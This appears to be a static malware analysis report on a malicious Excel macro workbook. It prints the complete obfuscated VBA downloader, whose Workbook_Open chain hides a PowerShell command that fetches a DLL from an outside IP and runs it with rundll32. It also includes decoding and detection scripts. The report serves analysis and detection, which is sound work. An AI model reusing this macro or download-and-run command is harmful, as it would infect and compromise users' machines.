Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 0b149fc1f48da1d2…

MALICIOUS

Office (OOXML) / .XLSM

Size: 87.2 KB
Created: 2006-09-28 05:33:49 UTC (OOXML core property; author-controlled, so not evidence of the file's real age)
Authoring application: Microsoft Excel 12.0000
First seen: 2021-10-26
MD5: 7ac2366ab4515b9f37be3187deea9bc0
SHA-1: c4cee812f0fb97c510e149a28c1a55b6c5da2c9e
SHA-256: 0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d
Risk score: 130

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1071.001 Application Layer Protocol: Web Protocols

The file is an XLSM workbook whose VBA project (module ЭтаКнига, the Russian-locale name of ThisWorkbook) carries a Workbook_Open handler, so the chain runs as soon as macros are enabled: Workbook_Open calls wejlfkdjf, which calls ertjwlkfj. That function rebuilds two strings by stripping a junk token ("jLw" for the executable path, "aYk" for the arguments) with rhqwoelhsld, a thin wrapper around VBA Replace, and passes the result to Shell(..., 0) (window style 0 = vbHide) only on iteration 19,999,998 of a 20,000,000-round loop that computes Sin(i), a CPU-burning delay most likely intended to outlast sandbox time-outs. The extracted source is complete, not truncated, so the command can be recovered statically: C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc <base64> & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW. The -enc argument is base64 over UTF-16LE and decodes to an Invoke-WebRequest that fetches http://45.86.65.197/images/subzero.png (a DLL served under an image name) and writes it to a clb.dll path, after which rundll32 loads that DLL and calls its AloperNoteW export. One caveat: decoded exactly as it appears in the extracted source, the -OutFile path is C:\ProgramDGta\clb.dll, which does not match the C:\ProgramData\clb.dll handed to rundll32; taken literally the chain fails at the rundll32 stage, so both paths should be treated as indicators. The remaining routines (progress-bar loops, duplicate-cell clearing, the dgfjsldk sheet filter that references undefined names, and the loops guarded by i = 998) are filler that is never reached from Workbook_Open. No specific family could be identified.
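The string recovery described above, written out as an added Python example (not part of the report and not code from the sample): it copies the two obfuscated literals and their junk tokens verbatim from the extracted macros.bas below, strips the junk the same way rhqwoelhsld does with VBA Replace, reverses PowerShell's -enc encoding (base64 of UTF-16LE), and pulls out the URL, the -OutFile path and the rundll32 target. The regexes and the path-mismatch flag are this example's own additions, not something the report computes.

```python
import base64
import re
from typing import Optional

# Junk tokens and obfuscated literals copied verbatim from the extracted
# macros.bas (ertjwlkfj builds them, rhqwoelhsld strips the junk). Raw strings
# keep the backslashes exactly as the VBA source has them.
JUNK_EXE = "jLw"
JUNK_ARGS = "aYk"
OBF_EXE = r"jLwCjLw:jLw\jLwWjLwijLwndjLwowjLws\SjLwysjLwtejLwm3jLw2\cjLwmjLwd.jLwejLwxjLwe"
OBF_ARGS = (
    r"aYk/aYkc saYktaaYkraYkt /aYkB /WaYkAIaYkT paYkoaYkweaYkrsaYkheaYklaYkl aYk-aYkenaYkc "
    r"SQaYkBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwaYkA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzaYkAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdaYkQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABaYkHAHQAYQBcAGMAbABiAC4AZABsAGwAIgaYkA"
    r"aYk="   # the VBA appends this piece with  & "aYk="
    r" aYk& saYktaYkaraYkt aYkCaYk:aYk\aYkWaYkinaYkdoaYkws\SaYkysaYkteaYkmaYk3aYk2\raYkunaYkdlaYkl3aYk2.aYkeaYkxaYke aYkCaYk:aYk\aYkPraYkoaYkgraYkamaYkDaaYktaYka\caYklb.daYklaYkl,AlaYkoperNotaYkeaYkW"
)


def strip_junk(text: str, junk: str) -> str:
    """Mirror of rhqwoelhsld(): VBA Replace(text, junk, "") is a plain,
    case-sensitive removal of every occurrence of the junk token."""
    return text.replace(junk, "")


def rebuild_shell_command() -> str:
    """Reconstruct the exact string the macro passes to Shell(hkiwe + " " + wkjh, 0)."""
    return strip_junk(OBF_EXE, JUNK_EXE) + " " + strip_junk(OBF_ARGS, JUNK_ARGS)


def decode_powershell_enc(cmdline: str) -> Optional[str]:
    """powershell -enc / -EncodedCommand takes base64 of a UTF-16LE string."""
    m = re.search(r"-enc\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_iocs(cmdline: str) -> dict:
    """Pull network and host indicators out of the rebuilt command line.
    The regexes are this example's own; the path_mismatch flag compares the
    PowerShell drop path with the DLL path given to rundll32."""
    script = decode_powershell_enc(cmdline) or ""
    urls = re.findall(r'https?://[^\s"]+', script)
    outfiles = re.findall(r'-OutFile\s+"([^"]+)"', script, re.IGNORECASE)
    rundll = re.findall(r"rundll32\.exe\s+(\S+?),(\S+)", cmdline, re.IGNORECASE)
    mismatch = bool(outfiles and rundll and outfiles[0].lower() != rundll[0][0].lower())
    return {
        "urls": urls,
        "dropped_paths": outfiles,
        "rundll32_targets": [{"dll": d, "export": e} for d, e in rundll],
        "path_mismatch": mismatch,
    }


if __name__ == "__main__":
    cmd = rebuild_shell_command()
    print("Shell():", cmd)
    print("-enc decodes to:", decode_powershell_enc(cmd))
    for k, v in extract_iocs(cmd).items():
        print(f"{k}: {v}")
```

Running it reproduces the command line quoted in the summary and sets path_mismatch to True, because the literal on the page decodes the -OutFile directory as ProgramDGta while rundll32 is pointed at ProgramData. Whether that is a defect in the sample or a one-character transcription difference cannot be settled from the report alone; record both paths.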

Heuristics 5

  • VBA project inside OOXML [medium] OOXML_VBA (3 related findings)
    Document contains a VBA project (VBA macros present).
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
        wer = te + Shell(hkiwe + " " + wkjh, 0)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are normally named in a detail line, which is not reproduced in this report; for this sample the decoded source shows the pair Workbook_Open and Shell.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script:
        Private Sub Workbook_Open()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
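The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as an added Python example (not the analysis engine's own code): it takes the two token lists from the heuristic description above and fires only when at least one token from each list is present in the same text. The engine runs over compiled p-code streams; this example assumes you are feeding it text (decompressed VBA source or a p-code disassembly), and the three sample snippets are constructed here, the first of them from the two matched lines quoted in the findings.

```python
import re

# Token lists exactly as the heuristic description gives them.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro"]


def _hits(text, tokens):
    """Return the tokens present as whole identifiers, case-insensitively.
    \\b is unreliable next to '.', so bound the match on non-identifier
    characters instead; this keeps 'Shell' from matching inside 'ShellExecute'."""
    found = []
    for tok in tokens:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, text, re.IGNORECASE):
            found.append(tok)
    return found


def pcode_autoexec_exec(stream_text):
    """Apply the pairing rule: fires only when both an auto-exec entry point
    and an execution token occur in the same stream. Returns
    (fires, autoexec_hits, exec_hits) so the detail line can name the pair."""
    auto = _hits(stream_text, AUTOEXEC_TOKENS)
    execs = _hits(stream_text, EXEC_TOKENS)
    return (bool(auto) and bool(execs), auto, execs)


# Constructed inputs: the first combines the two matched lines from this report.
SAMPLE_BOTH = (
    'Private Sub Workbook_Open()\n'
    '    wer = te + Shell(hkiwe + " " + wkjh, 0)\n'
    'End Sub\n'
)
SAMPLE_AUTOEXEC_ONLY = 'Private Sub Workbook_Open()\n    MsgBox "hi"\nEnd Sub\n'
SAMPLE_EXEC_ONLY = (
    'Sub helper()\n'
    '    Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'End Sub\n'
)

if __name__ == "__main__":
    for name, text in [("both", SAMPLE_BOTH), ("autoexec only", SAMPLE_AUTOEXEC_ONLY),
                       ("exec only", SAMPLE_EXEC_ONLY)]:
        fires, auto, execs = pcode_autoexec_exec(text)
        print(f"{name}: fires={fires} autoexec={auto} exec={execs}")
```

Only the first sample fires; the other two each carry one half of the pair and stay quiet, which is the property the description insists on. On a real p-code-only document you would run this over a disassembly (for example pcodedmp output) rather than over source.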

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6227 bytes
SHA-256: 8a7e7819df6b91f47eafc2ab79d0af373d8adb5e25bdbaf0c3846296f5a42d91
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Sub df4yw35yhdf()
Dim iCount As Long, i As Long, j As Long, k As Long
Dim Str1 As String, Str2 As String
k = 1
iCount = Selection.Cells.Count
    For i = k To iCount
        Str1 = CStr(Selection.Cells(i).Value)
            If Str1 <> "" Then
                For j = i To iCount
                    Str2 = CStr(Selection.Cells(j).Value)
                        If i <> j And Str1 = Str2 Then Selection.Cells(j).ClearContents
                Next j
            End If
    Next i
End Sub



Sub erfllj()
    Dim lr As Long
    Dim lAllCnt As Long
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        If bShowBar Then Call MyProgresBar
    Next
    If bShowBar Then Unload frmStatusBar
End Sub

Sub bwla4kl()
    Dim lr As Long, lp As Double
    Dim lAllCnt As Long
    Dim s As String
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        lp = lr \ 100
        s = String(lp \ 10, ChrW(10152)) & String(11 - lp \ 10, ChrW(8700))
        Application.StatusBar = "????: " & lp & "% " & s: DoEvents
        DoEvents
    Next
    Application.StatusBar = False
End Sub

Function ertjwlkfj(flkas As Long, fewo4ih As String, hnfkl34 As String, ndr54 As Long, bvret As Long) As Integer
    
   Dim fhks, hkj23, hkiwe, wkjh As String
   Dim wer As Double
    fhks = "pcw"
    hkj23 = fhks & "w"
    
    fhks = "jLwCjLw:jLw\jLwWjLwijLwndjLwowjLws\SjLwysjLwtejLwm3jLw2\cjLwmjLwd.jLwejLwxjLwe"
    
    For i = 1 To 20
        Dim uow As Double
        If i = 998 Then
            MsgBox "q34"
        End If
    Next
    
    hkiwe = rhqwoelhsld(fhks, "jLw")
    
    wer = wer + 1
    
    hkj23 = "aYk/aYkc saYktaaYkraYkt /aYkB /WaYkAIaYkT paYkoaYkweaYkrsaYkheaYklaYkl aYk-aYkenaYkc SQaYkBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwaYkA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzaYkAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdaYkQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABaYkhAHQAYQBcAGMAbABiAC4AZABsAGwAIgaYkA" & "aYk=" + " aYk& saYktaYkaraYkt aYkCaYk:aYk\aYkWaYkinaYkdoaYkws\SaYkysaYkteaYkmaYk3aYk2\raYkunaYkdlaYkl3aYk2.aYkeaYkxaYke aYkCaYk:aYk\aYkPraYkoaYkgraYkamaYkDaaYktaYka\caYklb.daYklaYkl,AlaYkoperNotaYkeaYkW"
    
    For i = 5 To 30
        Dim e As Integer
        If i = 998 Then
            e = e + i
        End If
    Next
    
    wkjh = rhqwoelhsld(hkj23, "aYk")
    
    For i = 1 To 20000000
        Dim te As Double
        te = Sin(i)
        If i = 19999998 Then
            wer = te + Shell(hkiwe + " " + wkjh, 0)
        End If
    Next
    
    ertjwlkfj = 0
End Function

Sub gwolkel()
    Dim lr As Long
    Dim lAllCnt As Long
    Const lMaxQuad As Long = 20
    lAllCnt = 10000
    For lr = 1 To lAllCnt
        Application.StatusBar = "???: " & Int(100 * lr / lAllCnt) & "%" & String(CLng(lMaxQuad * lr / lAllCnt), ChrW(9632)) & String(lMaxQuad - CLng(lMaxQuad * lr / lAllCnt), ChrW(9633))
        DoEvents
    Next
    Application.StatusBar = False
End Sub


Function rhqwoelhsld(ByVal jlvfd As String, bxcj As String) As String
    If jlvfd = "2" And bxcj = "2" Then
        Dim d As Byte
        d = CByte(jlvfd)
    Else
        rhqwoelhsld = Replace(jlvfd, bxcj, "")
    End If
End Function






Sub dgfjsldk()
    Dim Workbooks As Object
    NbCol = Workbooks(Fname1).Sheets(LName).Rows(1).Find(What:="Дата", LookIn:=xlValues, SearchDirection:=xlPrevious, SearchOrder:=xlByColumns).Column
    Dim a(), i As Long
    i = Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, 1).End(xlUp).Row
    a = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(i, NbCol)).Value
    ReDim B(1 To i, 1 To 1)
    Do While i > 1
        If dMain.exists(a(i, 1)) Then B(i, 1) = 1
        i = i - 1
    Loop
    Dim x As Range
    NbCol = Workbooks(Fname1).Sheets(LName).Cells(1, Columns.Count).End(xlToLeft).Column + 2
    Erase B
    Set x = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).Find(1, , , xlWhole)
    If Not x Is Nothing Then
        Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).ColumnDifferences(x).EntireRow.Hidden = True
    End If
End Sub

Private Sub Workbook_Open()
    Dim fojn As Long
    Dim x, y, z As Double
    Dim hnfkj As String
    
    wejlfkdjf
    
    hnfkj = "a"
End Sub


Public Sub wejlfkdjf()
    Dim fojn As Long
    Dim fjl As String
    
    fjl = "w"
        
    fojn = ertjwlkfj(0, "", "", 0, 0)
    If fojn = 123 Then
        fjl = "r" & fjl
    End If
End Sub

Sub ghayh45aghf()
    Dim lAllCnt As Long, lr As Long
    Dim rc As Range
    lAllCnt = Selection.Count
    For Each rc In Selection
        lr = lr + 1
        Application.StatusBar = "??: " & Int(100 * lr / lAllCnt) & "%"
        DoEvents
    Next
    Application.StatusBar = False
End Sub



Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 27648 bytes
SHA-256: 5362a865257aaafdd7503136b910382ca531abb77dbd01c8752c8a55e02b821b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).